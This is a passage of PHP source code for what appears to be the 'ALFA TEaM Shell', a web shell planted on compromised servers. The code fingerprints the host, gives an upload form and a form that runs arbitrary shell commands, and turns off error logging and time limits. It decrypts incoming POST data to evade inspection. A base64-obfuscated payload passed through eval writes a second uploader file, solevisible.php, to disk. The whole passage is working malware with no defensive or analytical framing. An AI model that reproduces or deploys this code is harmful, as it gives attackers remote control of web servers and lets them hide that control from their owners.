    echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>PHP_OS</font><br>";
    echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
    echo "PHP Version: <font color=white>PHP_VERSION</font><br />";
    echo "PWD:<font color=#FFFFFF> " . str_replace("\\", "/", @getcwd()) . "/<br />";
    echo "<b style='color: #7CFC00'>Safe Mode : {$r}<br>";
    echo "<font color=#7CFC00>Disable functions : </font>";
    $disfun = @ini_get('disable_functions');
    if (empty($disfun)) {
        $disfun = '<font color="green">NONE</font>';
    }
    echo "<font color=red>";
    echo "{$disfun}";
    echo "</font><br>";
    echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
    echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>" . (function_exists('gethostbyname') ? @gethostbyname($_SERVER["HTTP_HOST"]) : '???') . "</font><br><p>";
    echo "<hr><center><form onSubmit=\"this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));\" action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
    echo 'CWD: <input type="text" name="cwd" value="' . str_replace("\\", "/", @getcwd()) . '/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
    if (isset($_FILES['file'])) {
        if (@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']) . '/' . $_FILES['file']['name'])) {
            echo "<b><font color=\"#7CFC00\"><center>Upload Successfully ;)</font></a><font color=\"#7CFC00\"></b><br><br></center>";
        } else {
            echo "<center><b><font color=\"#7CFC00\">Upload failed :(</font></a><font color=\"#7CFC0\"></b></center><br><br>";
        }
    }
    echo "<hr><form onSubmit=\"this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));\" method=\"POST\">Execute Command: <input name=\"command_solevisible\" value=\"\" size=\"59\" type=\"text\" align=\"left\" ><input name=\"execute\" value=\"Execute\" type=\"submit\"><br></form>\n<hr><pre>";
    if (isset($_POST['command_solevisible'])) {
        if (strtolower("PHP") == "win") {
            $separator = '&';
        } else {
            $separator = ';';
        }
        $solevisible = "cd '" . addslashes(str_replace("\\", "/", @getcwd())) . "'" . $separator . "" . __ZGVjb2Rlcg($_POST['command_solevisible']);
        echo alfaEx($solevisible);
    }
    echo "</pre>\n</body></html>";
    exit;
}
@error_reporting("\0\0\17\3\30");
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
if (function_exists('set_magic_quotes_runtime')) {
    @set_magic_quotes_runtime(0);
}
foreach ($_POST as $key => $value) {
    if (is_array($_POST[$key])) {
        $i = 0;
        foreach ($_POST[$key] as $f) {
            $f = trim(str_replace(' ', '+', $f));
            $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
            $i++;
        }
    } else {
        $value = trim(str_replace(' ', '+', $value));
        $_POST[$key] = decrypt_post($value, _AlfaSecretKey());
    }
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower("PHP") == "win") {
    $GLOBALS['sys'] = 'win';
} else {
    $GLOBALS['sys'] = 'unix';
}
$GLOBALS['home_cwd'] = @getcwd();
if ($_POST["a"] != "GetPathHistory") {
    if ($_SESSION[__LAST_CWD__] != $_POST['c']) {
        $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
    }
}
$GLOBALS["need_to_update_header"] = "false";
if (isset($_POST['c'])) {
    if (!@chdir($_POST['c'])) {
        $GLOBALS['glob_chdir_false'] = true;
    }
}
$GLOBALS['cwd'] = isset($_SESSION[__LAST_CWD__]) && $_SESSION[__LAST_CWD__] != '' && !isset($_POST['c']) ? $_SESSION[__LAST_CWD__] : @getcwd();
if (!@is_dir) {
    $GLOBALS['cwd'] = @getcwd();
}
if ($GLOBALS['sys'] == 'win') {
    $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
    $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
    $_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
}
if ($GLOBALS['cwd'][strlen($GLOBALS['cwd']) - 1] != '/') {
    $GLOBALS['cwd'] .= '/';
}
function alfaGetPathHistory()
{
    echo isset($_SESSION[__PATH_HISTORY__]) && !empty($_SESSION[__PATH_HISTORY__]) ? $_SESSION[__PATH_HISTORY__] : $GLOBALS['home_cwd'];
}
function alfahead()
{
    if (!function_exists('sys_get_temp_dir')) {
        function sys_get_temp_dir()
        {
            foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {
                if ($temp = getenv($env_var)) {
                    return $temp;
                }
            }
            $temp = tempnam($GLOBALS['__file_path'], '');
            if (_alfa_file_exists($temp, false)) {
                unlink($temp);
                return dirname($temp);
            }
            return null;
        }
    }
    $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
    $alfa_uploader = "\$x = base64_decode(\"PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+\");\$solevisible = fopen(\"solevisible.php\",\"w\");fwrite(\$solevisible,\$x);";
    define("ALFA_UPLOADER", "eval(base64_decode('" . __ZW5jb2Rlcg($alfa_uploader) . "'))");
    define("ALFA_TEMPDIR", function_exists("sys_get_temp_dir") ? @is_writable(str_replace('\\', '/', sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable('.') ? '.' : false) : false);
    if (!isset($_POST['ajax'])) {
        function Alfa_GetDisable_Function()
        {
            $disfun = @ini_get('disable_functions');
            $afa = '<span class="header_show_all">All Functions Accessible</span>';
            if (empty($disfun)) {
                return $afa;
            }
            $s = explode(',', $disfun);
            $s = array_unique($s);
            $i = 0;
            $b = 0;
            $func = array('system', 'exec', 'shell_exec', 'proc_open', 'popen', 'passthru', 'symlink', 'dl');
            $black_list = array();
            $allow_list = array();
            foreach ($s as $d) {
                $d = trim($d);
                if (empty($d) || !is_callable($d)) {
                    continue;
                }
                if (!function_exists($d)) {
                    if (in_array($d, $func)) {
                        $dis .= $d . " | ";
                        $b++;
                        $black_list[] = $d;
                    } else {
                        $allow_list[] = $d;
                    }
                    $i++;
                }
            }
            if ($i == 0) {
                return $afa;
            }
            if ($i <= count($func)) {
                $all = array_values(array_merge($black_list, $allow_list));
                return '<span class="disable_functions">' . implode(" | ", $all) . '</span>';
            }
            return '<span class="disable_functions">' . $dis . '</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All (' . $i . ')</span></a>';
        }
        function AlfaNum()
        {
            $args = func_get_args();
            $alfax = array();
            $find = array();
            for ($i = 1; $i <= 10; $i++) {
                $alfax[] = $i;
            }
            foreach ($args as $arg) {
                $find[] = $arg;
            }
            echo "<script>";
            foreach ($alfax as $alfa) {
                if (in_array($alfa, $find)) {
                    continue;
                }
                echo 'alfa' . $alfa . "_=";
            }
            echo "\"\"</script>";
        }
        if (empty($_POST['charset'])) {
            $_POST['charset'] = $GLOBALS['default_charset'];
        }
        $freeSpace = function_exists('diskfreespace') ? @diskfreespace($GLOBALS['cwd']) : '?';
        $totalSpace = function_exists('disk_total_space') ? @disk_total_space($GLOBALS['cwd']) : '?';
        $totalSpace = $totalSpace ? $totalSpace : 1;
        $on = "<span class='header_on'> ON </span>";
        $of = "<span class='header_off'> OFF </span>";
        $none = "<span class='header_none'> NONE </span>";
        if (function_exists('ssh2_connect')) {
            $ssh2 = $on;
        } else {
            $ssh2 = $of;
        }
        if (function_exists('curl_version')) {
            $curl = $on;
        } else {
            $curl = $of;
        }
        if (function_exists('mysql_get_client_info')) {
            $mysql = $on;
        } else {
            $mysql = $of;
        }
        if (function_exists('mssql_connect')) {
            $mssql = $on;
        } else {
            $mssql = $of;
        }
        if (function_exists('pg_connect')) {
            $pg = $on;
        } else {
            $pg = $of;
        }
        if (function_exists('oci_connect')) {
            $or = $on;
        } else {
            $or = $of;
        }
        if (@ini_get('disable_functions')) {
            $disfun = @ini_get('disable_functions');
        } else {
            $disfun = "All Functions Enable";
        }
        if (@ini_get('safe_mode')) {
            $safe_modes = "<span class='header_off'>ON</span>";
        } else {
            $safe_modes = "<span class='header_on'>OFF</span>";
        }
        $cgi_shell = "<span class='header_off' id='header_cgishell'>OFF</span>";
        if (@ini_get('open_basedir')) {
            $basedir_data = @ini_get('open_basedir');
            if (strlen($basedir_data) > 120) {
                $open_b = substr($basedir_data, 0, 120) . "...";
            } else {
                $open_b = $basedir_data;
            }
        } else {
            $open_b = $none;
        }
        if (@ini_get('safe_mode_exec_dir')) {
            $safe_exe = @ini_get('safe_mode_exec_dir');
        } else {
            $safe_exe = $none;
        }
        if (@ini_get('safe_mode_include_dir')) {
            $safe_include = @ini_get('safe_mode_include_dir');
        } else {
            $safe_include = $none;
        }
        if (!function_exists('posix_getegid')) {
            $user = function_exists("get_current_user") ? @get_current_user() : "????";
            $uid = function_exists("getmyuid") ? @getmyuid() : "????";
            $gid = function_exists("getmygid") ? @getmygid() : "????";
            $group = "?";
        } else {
            $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : array("name" => "????", "uid" => "????");
            $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : array("name" => "????", "gid" => "????");
            $user = $uid['name'];
            $uid = $uid['uid'];
            $group = $gid['name'];
            $gid = $gid['gid'];
        }
        $cwd_links = '';
        $path = explode("/", $GLOBALS['cwd']);
        $n = count($path);
        for ($i = 0; $i < $n - 1; $i++) {
            $cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
            for ($j = 0; $j <= $i; $j++) {
                $cwd_links .= $path[$j] . '/';
            }
            $cwd_links .= "\")'>" . $path[$i] . "/</a>";
        }
        $drives = "";
        foreach (range('a', 'z') as $drive) {
            if (@is_dir($drive . ':\\')) {
                $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
            }
        }
        $csscode = '	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
        echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<link href="' . __showicon('alfamini') . '" rel="icon" type="image/x-icon"/>
<title>..:: ' . $_SERVER['HTTP_HOST'] . ' ~ ALFA TEaM Shell - v' . __ALFA_VERSION__ . ' ::..</title>
<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
<style type="text/css">
.hlabale {
    color: #67ABDF;
    border-radius: 4px;
    border: 1px solid #27979B;
    margin-left: 7px;
    padding: 2px;
}
#tbl_sympphp tr {
	text-align: center;
}
.editor-view {
	position: relative;
}
.view-content {
	position: absolute;
	overflow-y: auto;
	width: 100%;
	height: 475px;
}
*::-webkit-scrollbar-track {
	-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
	border-radius: 10px;
	background-color: #000115;
}
*::-webkit-scrollbar{
	width: 10px;
	background-color: #000115;
}
*::-webkit-scrollbar-thumb {
	border-radius: 10px;
	-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
	background-color: rgb(30, 130, 181);
}
.editor-file-name {
	margin-left: 29px;
	margin-top: 4px;
	overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}
.editor-icon {
	position: absolute;
}
.is_active {
	background: rgba(49, 55, 93, 0.77);
	border-radius: 10px;
}
.history-list {
	height: 88%;
	overflow-y: auto;
}
#editor-minimized,#cgiloader-minimized {
	display: block;
	position: fixed;
	right: -30px;
	width: 30px;
	height: 30px;
	top: 30%;
}
.minimized-wrapper {
	position: relative;
	background: rgb(14, 48, 74);
    width: 44px;
    height: 167px;
	cursor: pointer;
	border-bottom-left-radius: 5px;
	border-top-left-radius: 5px;
}
.minimized-text {
    transform: rotate(-90deg);
    color: wheat;
    font-size: x-large;
    display: inline-block;
    position: absolute;
    right: -51px;
    width: 129px;
    top: 50px;
    border-top-left-radius: 4%;
    height: 56px;
    padding: 3px
}
.close-button,.editor-minimize {
	height: 26px;
    width: 38px;
    right: 7px;
    background: rgb(29, 86, 115);
    cursor: pointer;
    position: absolute;
    box-sizing: border-box;
    line-height: 50px;
    display: inline-block;
    top: 17px;
    border-radius: 100px;
}
.editor-minimize {right: 50px;}
.close-button:before,.close-button:after,.editor-minimize:before {
	transform: rotate(-45deg);
    content: "";
    position: absolute;
    top: 63%;
    right: 6px;
    margin-top: -5px;
    margin-left: -25px;
    display: block;
    height: 4px;
    width: 27px;
    background-color: rgba(216, 207, 207, 0.75);
    transition: all 0.25s ease-out;
}
.editor-minimize:before{
	transform: rotate(0deg);
}
.close-button:after {
  transform: rotate(-135deg);
}
.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
	background-color: red;
}
.close-button:hover,.editor-minimize:hover{
	background-color: rgba(39, 66, 80, 0.96);
}
#editor,#cgiloader {
	display: none;
	position: fixed;
    top: 0;
	width: 100%;
	height: 100%;
}
.editor-wrapper {
	width: 100%;
    height: 100%;
    position: relative;
    top: 1%;
}
.editor-header {
	width: 97%;
    background: rgba(21, 66, 88, 0.93);
    height: 37px;
    margin-left: 13px;
    position: relative;
	border-top-left-radius: 15px;
	border-top-right-radius: 15px;
}
.editor-path {
	position: absolute;
    font-size: x-large;
    margin-left: 10px;
    top: 6px;
    color: springgreen;
}
.editor-modal {
    position: relative;
    top: 0;
    background-color: rgba(0, 1, 23, 0.95);
    height: 90%;
    margin-left: 20%;
    margin-right: 2%;
    border: 2px #0e304a solid;
}
.editor-explorer {
    width: 19%;
    height: 90%;
    background-color: rgba(0, 1, 23, 0.94);
    position: absolute;
    z-index: 2;
    left: 1%;
    border: 2px rgb(14, 48, 74) solid;
}
.editor-controller {
	position: relative;
	top: -13px;
}
.file-holder {
	position: relative;
    width: 100%;
    height: 30px;
}
.file-holder > .history {
	position: absolute;
    color: rgb(3, 179, 163);
    cursor: pointer;
	left:5px;
    font-size: 18px;
    font-family: sans-serif;
	width:89%;
	height:100%;
	z-index: 3;
	border-radius: 10px;
	transition: background-color 600ms ease-out;
}
.file-holder > .history-close {
	display: block;
    opacity: 0;
    position: absolute;
    right: 2px;
    width: 20px;
    top: 4px;
    text-align: center;
    cursor: pointer;
    color: white;
    background: red;
    border-radius: 100px;
    font-family: monospace;
    z-index: 10;
    transition: opacity 600ms ease-out;
    font-size: 15px;
    height: 19px;
}
.file-holder > .history:hover {
	background-color: #646464;
}
.editor-explorer > .hheader {
	position: relative;
    color: rgb(20, 255, 7);
    border-bottom: 2px rgb(32, 106, 162) solid;
    text-align: center;
    font-family: sans-serif;
    margin-bottom: 10px;
	height: 55px;
}
.editor-search {
	position: absolute;
    bottom: 7px;
    left: 31px;
}
.hheader-text {
	position: absolute;
    left: 8px;
    top: 2px;
}
.history-clear {
	position: absolute;
    right: 8px;
    top: 2px;
    cursor: pointer;
}
.editor-body {
	position: relative;
	margin-left: 3px;
}
.editor-anim-close {
	' . showAnimation("editorClose") . '
}
@keyframes editorClose {
	0% {
		transform: scale(1);
		opacity: 1;
	}
	100% {
		transform: scale(0);
		opacity: 0;
	}
}
.editor-anim-minimize {
	' . showAnimation("editorMinimize") . '
}
@keyframes editorMinimize {
	0% {
		right:0px;
		opacity: 1;
	}
	100% {
		right: -2000px;
		opacity: 0;
	}
}
.editor-anim-show {
	' . showAnimation("editorShow") . '
}
@keyframes editorShow {
	0% {
		right:-2000px;
		opacity: 0;
	}
	100% {
		right: 0px;
		opacity: 1;
	}
}
.minimized-show {
	' . showAnimation("minimizeShow") . '
}
@keyframes minimizeShow {
	0% {
		right: -30px;
		opacity: 0;
	}
	100% {
		right: 0px;
		opacity: 1;
	}
}
.minimized-hide {
	' . showAnimation("minimizeHide") . '
}
@keyframes minimizeHide {
	0% {
		right: 0px;
		opacity: 1;
	}
	100% {
		right: -30px;
		opacity: 0;
	}
}
.solevisible-text:hover {
	-webkit-text-shadow: 0px 0px 25px #00FF00;
	-moz-text-shadow: 0px 0px 25px #00FF00;
	-ms-text-shadow: 0px 0px 25px #00FF00;
	text-shadow: 0px 0px 25px #00FF00;
}
.update-holder {
    position: fixed;
    top: 0;
    background-color: rgba(0, 24, 29, 0.72);
    width: 100%;
    height: 100%;
}
.update-partner {
    width: 50%;
    position: relative;
    border-radius: 31px;
    height: 200px;
    background-color: rgba(3, 3, 41, 0.47);
    text-align: center;
    color: rgba(252, 253, 251, 0.88);
    margin-left: 25%;
    top: 23%;
    font-family: "Francois One", sans-serif;
}
.update-partner:hover {
-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
}
.update-content {
	position: relative;
}
.update-content > a {
    text-decoration: none;
    position: absolute;
    color: rgba(103, 167, 47, 0.77);
    left: 24%;
    margin-top: 7%;
    font-size: 40px;
    font-family: "Francois One", sans-serif;
}
.update-close {
	position: absolute;
    right: 0;
    margin-right: 23px;
    top: 10px;
    font-size: 27px;
    background-color: #130f50;
    width: 5%;
    border-radius: 100px;
    cursor: pointer;
    border: 2px rgb(14, 38, 90) solid;
}
.update-close:hover {
	border: 2px #25ff00 solid;
    color: #FF0000;
}
.filestools {
    height: auto;
    width: auto;
    color: #67ABDF;
    font-size: 12px;
    font-family: Verdana,Geneva,sans-serif;
}
@-moz-document url-prefix() {
	#search-input {
		width: 173px;
	}
	.editor-path {
		top:3px;
	}
}
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
#alfaloader{' . $csscode . 'width:100px;height:100px;}
#a_loader{' . $csscode . 'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:' . alfa_getColor("header_values") . ';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? '0' : '1') . 'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(' . __showicon('btn') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px 